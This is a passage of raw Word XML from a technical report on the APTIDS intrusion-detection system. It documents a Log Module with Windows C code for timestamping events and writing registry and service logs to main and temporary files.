          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B77A88" w:rsidRDefault="00993912" w:rsidP="00B77A88">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="95" w:name="_Toc484963014"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Log Module</w:t>
      </w:r>
      <w:r w:rsidR="00B77A88">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> function</w:t>
      </w:r>
      <w:bookmarkEnd w:id="95"/>
    </w:p>
    <w:p w:rsidR="00993912" w:rsidRDefault="00993912" w:rsidP="00993912">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">In APTIDS, Log Module perform </w:t>
      </w:r>
      <w:r w:rsidR="00BE47BE">
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>three</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> operations. Firstly, “getDateTime” is called to get the current time and date at which an event occurs, using a function called “localtime”.</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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>VOID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getDateTime(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>ret_timeBuffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> =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t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>wRet_timeBuffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>) {</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time_t</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> rawtime;</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r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>tm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> * timeinfo;</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timeBuffer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calloc(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">80,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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>));</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time(&amp;rawtime);</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timeinfo = localtime(&amp;rawtime);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993912" w:rsidRDefault="00993912" w:rsidP="00993912">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strftime(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">timeBuffer, 80, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"[%d-%m-%Y %I:%M:%S] "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, timeinfo);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7" w:rsidP="00993912">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993912" w:rsidRDefault="00993912" w:rsidP="00993912">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> The time return by “localtime” is in UTF-8 format, for return the date time value in bot UTF-8 and UTF-16, we implement a conversion in getDateTime.</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//Conver to Unicode</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lpTimeBuffer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INT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> cbByteNeeded = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>MultiByteToWideChar(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CP_UTF8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 0, timeBuffer, -1, lpTimeBuffer, 0);</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lpTimeBuffer = (</w:t>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calloc(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">cbByteNeeded,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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPWSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993912" w:rsidRDefault="00993912" w:rsidP="00993912">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MultiByteToWideChar(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CP_UTF8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 0, timeBuffer, -1, lpTimeBuffer, cbByteNeeded);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7" w:rsidP="00993912">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993912" w:rsidRDefault="00993912" w:rsidP="00993912">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>When the first argument is set to NULL and the second is passed in a wide char pointer (LPWSTR), getDateTime returns datetime data in UTF-16 format. Vice versa, it returns data in UTF-8. When both arguments are set, it returns data in UTF-8 and UTF-16. When both are NULL, it returns none.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00993912" w:rsidRDefault="00993912" w:rsidP="00993912">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE47BE" w:rsidRDefault="00BE47BE" w:rsidP="00993912">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>The second operation in Log Module is for writing log, which is a function called “WriteLog”.</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WriteLog(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>dwLogType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>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t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>wchLogBuffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>) {</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wchLogFile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wchLogTmpFile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rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>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hFile;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE47BE" w:rsidRDefault="00BE47BE" w:rsidP="00BE47BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>WriteLog specified a DWORD variable called “dwLogType” for identifying the type of log data being written. There are 2 type of log data in APTIDS, the LOG_TYPE_REGISTRY and LOG_TYPE_SERVICE defined in DataTypes.h.</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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>#define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LOG_TYPE_REGISTRY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</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808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>#define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LOG_TYPE_SERVICE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7"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BE47BE" w:rsidRDefault="00BE47BE" w:rsidP="00BE47BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">When calls for writing log, APTIDS modules </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>have to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> specify exactly which log type this data need to be written. Based on the log type, WriteLog generate specific name for log file and write data to that file.</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switch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>dwLogType</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>) {</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LOG_TYPE_REGISTRY</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wchLogFile = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>L"Logs/Registry.log"</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wchLogTmpFile = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>L"Logs/tmpRegistry.log"</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LOG_TYPE_SERVICE</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wchLogFile = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>L"Logs/Services.log"</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wchLogTmpFile = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>L"Logs/tmpService.Log"</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565A7" w:rsidRDefault="002565A7" w:rsidP="00BE47BE">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BE47BE" w:rsidRDefault="0074553E" w:rsidP="00BE47BE">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">There are 2 type of log files for each log type. A main log file which is used for storing log in the local system. This file will be written continuously. Another file is a temperamental log file, which is used to store a single line of the newest log data. This file and its content is read by a function for sending log to DLCH. </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lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>// Write to end of file</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dwByteNeeded = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>_tcslen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>wchLogBuffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</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LPOVERLAPPED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> lpOverLapped = (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPOVERLAPPED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>calloc(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">1,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2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>OVERLAPPED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>));</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lpOverLapped-&gt;Offset = 0xffffffff;</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lpOverLapped-&gt;OffsetHigh = 0xffffffff;</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dwByteNeeded *= 2;</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WriteFile(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hFile, (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPWSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>wchLogBuffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, dwByteNeeded, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, lpOverLapped);</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CloseHandle(hFile);</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//OPEN AND WRITE TO TEMP LOG FILE</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hFile = </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CreateFileW(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">wchLogTmpFile, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>GENERIC_WRITE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>FILE_SHARE_READ</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, 0, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CREATE_ALWAYS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 0, 0);</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WriteFile(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>hFile, (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>LPWSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>wchLogBuffer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, dwByteNeeded, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>NULL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003813E4" w:rsidRDefault="003813E4" w:rsidP="003813E4">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t>CloseHandle(hFile);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002565A7" w:rsidRDefault="002565A7" w:rsidP="003813E4">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0A48F6" w:rsidRDefault="000A48F6" w:rsidP="000A48F6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000A48F6" w:rsidRDefault="000A48F6" w:rsidP="000A48F6">
      <w:pPr>
        <w:rPr>
